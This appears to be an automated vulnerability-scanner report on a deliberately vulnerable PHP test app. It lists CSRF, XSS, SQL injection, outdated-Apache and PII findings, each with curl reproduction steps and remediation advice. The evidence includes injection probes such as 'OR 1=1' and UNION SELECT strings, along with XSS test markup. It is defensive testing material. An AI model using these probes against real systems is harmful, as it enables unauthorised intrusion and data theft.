<h2>Welcome Post</h2><p>Hello <b>world</b></p><form method='POST'>         <input name='title' placeholder='Title'>         <textarea name='content' placeholder='Content (try: {{7*7}} for Twig)'></textarea>         <select name='engine'>             <option value='default'>Defaul…
Remediation
Require an anti-CSRF token on state-changing requests and use SameSite cookies.
  • Add per-session/per-request CSRF tokens to all state-changing forms and verify them server-side.
  • Set SameSite=Lax/Strict on session cookies; verify Origin/Referer for sensitive actions.
  • Never perform state changes via GET.
Refs: CWE-352 · OWASP: CSRF Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=ssti
title=csrftest&content=csrfpayload&engine=php
200 51ms csrf-no-token
🔍 GGC-VULN-D0C 9.8 CRITICAL P0 Confirmed OUTDATED_COMPONENT apache 2.4.58 · CVE-2024-38475 HTTP Server / X-Powered-By banner 1/1 hits
Flow
The server banner indicates apache 2.4.58, which the version range for CVE-2024-38475 (fixed in 2.4.60) would cover — version-indicated only, not confirmed exploitable (banner may be backport-patched; vulnerable config/module not verified).
Impact
RCE — Direct
CWE / CVSS
CWE-1104 Use of Unmaintained/Vulnerable Third-Party Component  ·  CVSS 9.8 Critical
An unmaintained / known-vulnerable third-party component is in use; a published CVE may apply.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
Compliance Impact
A06:2021 – Vulnerable and Outdated Components
PCI-DSS v4.0 Req 6.3.1 / 6.3.3 (patch mgmt)  ·  ISO/IEC 27001:2022 A.8.8  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (outdated-component)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php'
Evidence (live response):
Server banner 'Apache/2.4.58' matches CVE-2024-38475 (CWE-22, Critical): mod_rewrite improper output escaping → URL mapped to filesystem (RCE / source disclosure). Affected: version < 2.4.60. VERSION-INDICATED / UNVERIFIED — this is a banner-only match: (1) a backported distro pa…
Remediation
Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build.
  • Upgrade to the fixed version listed for the CVE (or a distro build with the backported patch).
  • Confirm the real installed version — a backported security fix can leave the banner version unchanged (avoid false positives).
  • Suppress the version banner (ServerTokens Prod / expose_php=Off / remove X-Powered-By) to reduce fingerprinting.
  • Track dependencies with SCA (composer audit / npm audit / Dependabot) and patch on a schedule.
Refs: CWE-1104 · OWASP A06:2021 Vulnerable & Outdated Components · NVD
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php
outdated-component
200 0ms outdated-component
🔍 GGC-VULN-637 7.5 HIGH P1 Confirmed OUTDATED_COMPONENT apache 2.4.58 · CVE-2024-38476 HTTP Server / X-Powered-By banner 1/1 hits
Flow
The server banner indicates apache 2.4.58, which the version range for CVE-2024-38476 (fixed in 2.4.60) would cover — version-indicated only, not confirmed exploitable (banner may be backport-patched; vulnerable config/module not verified).
Impact
DOS — Direct
CWE / CVSS
CWE-1104 Use of Unmaintained/Vulnerable Third-Party Component  ·  CVSS 7.5 High
An unmaintained / known-vulnerable third-party component is in use; a published CVE may apply.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:H/RC:C
Compliance Impact
A06:2021 – Vulnerable and Outdated Components
PCI-DSS v4.0 Req 6.3.1 / 6.3.3 (patch mgmt)  ·  ISO/IEC 27001:2022 A.8.8  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (outdated-component)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php'
Evidence (live response):
Server banner 'Apache/2.4.58' matches CVE-2024-38476 (CWE-476, High): mod_proxy null-pointer dereference → DoS via malicious backend response headers. Affected: version < 2.4.60. VERSION-INDICATED / UNVERIFIED — this is a banner-only match: (1) a backported distro patch may leave…
Remediation
Upgrade the flagged component to a fixed release; version-indicated — verify against your actual (possibly backported) build.
  • Upgrade to the fixed version listed for the CVE (or a distro build with the backported patch).
  • Confirm the real installed version — a backported security fix can leave the banner version unchanged (avoid false positives).
  • Suppress the version banner (ServerTokens Prod / expose_php=Off / remove X-Powered-By) to reduce fingerprinting.
  • Track dependencies with SCA (composer audit / npm audit / Dependabot) and patch on a schedule.
Refs: CWE-1104 · OWASP A06:2021 Vulnerable & Outdated Components · NVD
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php
outdated-component
200 0ms outdated-component
GGC-XSS-FCA 5.4 MEDIUM P2 Confirmed XSS author crawl-form: ggsec_test_app.php?page=xss_stored&post_id=1 1/1 hits
Flow
A crawler-discovered POST form (not in the SAST plan) reflects a submitted field into HTML without encoding.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (crawl-xss-post)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'crawl-xss-post'
Evidence (live response):
[CRAWL] POST form field 'author' reflects an HTML payload unescaped in the response. <h2>Comments</h2><div class='comment'><b></b>: CSRF_injected_comment</div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='c…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=xss_stored&post_id=1
crawl-xss-post
200 0ms crawl-xss-post
GGC-XSS-909 5.4 MEDIUM P2 Confirmed XSS comment crawl-form: ggsec_test_app.php?page=xss_stored&post_id=1 1/1 hits
Flow
A crawler-discovered POST form (not in the SAST plan) reflects a submitted field into HTML without encoding.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (crawl-xss-post)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=xss_stored&post_id=1' --data 'crawl-xss-post'
Evidence (live response):
[CRAWL] POST form field 'comment' reflects an HTML payload unescaped in the response. <h2>Comments</h2><div class='comment'><b></b>: CSRF_injected_comment</div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='comment'><b></b>: </div><div class='…
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=xss_stored&post_id=1
crawl-xss-post
200 0ms crawl-xss-post
🗃 GGC-SQLI-733 8.2 HIGH P1 Confirmed SQL_QUERY email crawl-form: ggsec_test_app.php?page=sqli_second_order 1/1 hits
Flow
A crawler-discovered POST form (not in the SAST plan) returns a SQL error when a quote is injected into a field.
Impact
RCE — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend)  ·  CVSS 8.2 High
SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (crawl-sqli-post)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=sqli_second_order' --data 'crawl-sqli-post'
Evidence (live response):
[CRAWL] POST form field 'email' surfaced a SQL error for a single-quote payload. <p>User registered! ID: 71</p><p>Related posts query: SELECT * FROM posts WHERE title LIKE &#039;%&#039;|&#039; UNION SELECT 1,2,3,4,5-- -|%&#039; UNION SELECT 1,2,3,4,5-- -|&#039; UNION SELECT usern…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
  • Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
  • For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
  • Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
  • Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=sqli_second_order
crawl-sqli-post
200 0ms crawl-sqli-post
🔍 GGC-VULN-B8F 0.0 NONE P3 Confirmed PII_EXPOSURE Email address HTTP response body 1/1 hits
Flow
The application returns Email address in a response body; sensitive personal data / credentials are exposed to the client (and any intermediary).
Impact
NONE — Direct
CWE / CVSS
CWE-359 Exposure of Private Personal Information  ·  CVSS 0.0 None
Personal data is exposed in responses without need or access control (privacy / GDPR concern).
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
ⓘ No security impact (e.g. neutralised by a cast/guard, or informational) — reported for awareness, not scored.
Compliance Impact
A02:2021 – Cryptographic Failures
PCI-DSS v4.0 Req 3.4.1 / 3.5.1  ·  ISO/IEC 27001:2022 A.5.34 / A.8.24  ·  GDPR Art. 5(1)(f) + Art. 32 + Art. 34 (breach notification)
MITRE ATT&CK
T1213 Data from Information Repositories
Collection
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (pii-email)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1'
Evidence (live response):
Exposed Email address in a response body — 1 occurrence(s). Masked sample: a***@ggsec.local. First seen: ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1. Personal data / secrets should not be returned to unauthorised contexts (GDPR/RODO Art. 32).
Remediation
Stop returning personal data / secrets in responses; minimise, mask, and access-control sensitive fields.
  • Remove secrets (keys/tokens/private keys) from responses entirely; rotate any that leaked.
  • Return only the fields the client needs (data minimisation); mask IDs/cards (e.g. last 4) server-side.
  • Gate personal data behind authorization and send Cache-Control: no-store on those responses.
  • Map this to GDPR/RODO Art. 5 (minimisation) & Art. 32 (security of processing); log/justify any PII egress.
Refs: CWE-359 · OWASP: Sensitive Data Exposure · GDPR/RODO Art. 32
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1
pii-email
200 0ms pii-email
🗃 GGC-SQLI-845 8.2 HIGH P1 Confirmed SQL_QUERY id crawl: /ggsec_test_app.php?page=sqli_first_order&id=1 1/1 hits
Flow
A crawler-discovered param-bearing endpoint (not in the SAST plan) returns a SQL error when a quote is injected.
Impact
RCE — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend)  ·  CVSS 8.2 High
SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
90%High confidenceEvidence score 90/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (crawl-sqli)
  • +15 Damning token in response ("SQLSTATE")
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i '/ggsec_test_app.php?page=sqli_first_order&id=1'
Reflection @ offset 195 — via crawl-sqli:
…FROM users WHERE id = &#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: "'"</p>
Evidence (live response):
[CRAWL] param 'id' on a spider-discovered URL surfaced a SQL error for a single-quote payload. <h2>User Profile</h2><p>Query: SELECT * FROM users WHERE id = &#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: "'"</p>
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
  • Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
  • For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
  • Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
  • Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET /ggsec_test_app.php?page=sqli_first_order&id=1
crawl-sqli
200 0ms crawl-sqli
GGC-XSS-2E9 5.4 MEDIUM P2 Confirmed XSS search crawl: /ggsec_test_app.php?page=xss_reflected&search=test 1/1 hits
Flow
A crawler-discovered param-bearing endpoint (not in the SAST plan) reflects the parameter into HTML without encoding.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (crawl-xss)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i '/ggsec_test_app.php?page=xss_reflected&search=test'
Evidence (live response):
…for: <b>ggsecXSS7</b></p><input type='hidden' name='q' value='<b>ggsecXSS7</b>'><script>var lastSearch = '<b>ggsecXSS7</b>';</script>
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET /ggsec_test_app.php?page=xss_reflected&search=test
crawl-xss
200 0ms crawl-xss
GGC-XSS-DEB 5.4 MEDIUM P2 Confirmed XSS title ggsec_test_app.php?page=ssti&render=346 1/1 hits
Flow
Second-order stored XSS: user-controlled 'title' is written to storage and later echoed into HTML without output encoding on the render path (CWE-79).
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (stored-xss-2nd-order)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ssti&render=346'
Evidence (live response):
Stored XSS: a 'title' submitted to the store endpoint was rendered UNESCAPED (<b>ggsecSTORED7</b>) in the render response ggsec_test_app.php?page=ssti&render=346 — persisted, so it fires for every viewer of that page.
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=ssti&render=346
stored-xss-2nd-order
200 0ms stored-xss-2nd-order
GGC-XSS-F5F 5.4 MEDIUM P2 Confirmed XSS title ggsec_test_app.php?page=ssti&render=347 1/1 hits
Flow
Second-order stored XSS: user-controlled 'title' is written to storage and later echoed into HTML without output encoding on the render path (CWE-79).
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (stored-xss-2nd-order)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ssti&render=347'
Evidence (live response):
Stored XSS: a 'title' submitted to the store endpoint was rendered UNESCAPED (<b>ggsecSTORED7</b>) in the render response ggsec_test_app.php?page=ssti&render=347 — persisted, so it fires for every viewer of that page.
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=ssti&render=347
stored-xss-2nd-order
200 0ms stored-xss-2nd-order
GGC-XSS-17E 5.4 MEDIUM P2 Confirmed XSS title ggsec_test_app.php?page=ssti&render=348 1/1 hits
Flow
Second-order stored XSS: user-controlled 'title' is written to storage and later echoed into HTML without output encoding on the render path (CWE-79).
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (stored-xss-2nd-order)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=ssti&render=348'
Evidence (live response):
Stored XSS: a 'title' submitted to the store endpoint was rendered UNESCAPED (<b>ggsecSTORED7</b>) in the render response ggsec_test_app.php?page=ssti&render=348 — persisted, so it fires for every viewer of that page.
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=ssti&render=348
stored-xss-2nd-order
200 0ms stored-xss-2nd-order
🗃 GGC-SQLI-620 8.2 HIGH P1 Confirmed SQL_QUERY username crawl-form: ggsec_test_app.php?page=sqli_second_order 1/1 hits
Flow
A crawler-discovered POST form (not in the SAST plan) returns a SQL error when a quote is injected into a field.
Impact
RCE — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend)  ·  CVSS 8.2 High
SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
75%Medium confidenceEvidence score 75/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (crawl-sqli-post)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i -X POST 'ggsec_test_app.php?page=sqli_second_order' --data 'crawl-sqli-post'
Evidence (live response):
[CRAWL] POST form field 'username' surfaced a SQL error for a single-quote payload. <p>User registered! ID: 69</p><p>Related posts query: SELECT * FROM posts WHERE title LIKE &#039;%&#039;|&#039; UNION SELECT 1,2,3,4,5-- -|%&#039; UNION SELECT 1,2,3,4,5-- -|&#039; UNION SELECT us…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
  • Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
  • For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
  • Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
  • Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN POST ggsec_test_app.php?page=sqli_second_order
crawl-sqli-post
200 0ms crawl-sqli-post

Security Headers

HeaderStatusRiskRecommendation
Content-Security-Policy ✗ MISSING HIGH Prevents XSS/injection. Use nonce or strict-dynamic.
X-Frame-Options ✗ MISSING MEDIUM Prevents clickjacking. Use DENY or SAMEORIGIN.
X-Content-Type-Options ✗ MISSING LOW Prevents MIME sniffing. Set to nosniff.
Strict-Transport-Security ✗ MISSING MEDIUM Enforces HTTPS. min-age=31536000; includeSubDomains.
Referrer-Policy ✗ MISSING LOW Limits referrer leakage. strict-origin-when-cross-origin.
Permissions-Policy ✗ MISSING LOW Restrict unused browser features (camera, mic, geo).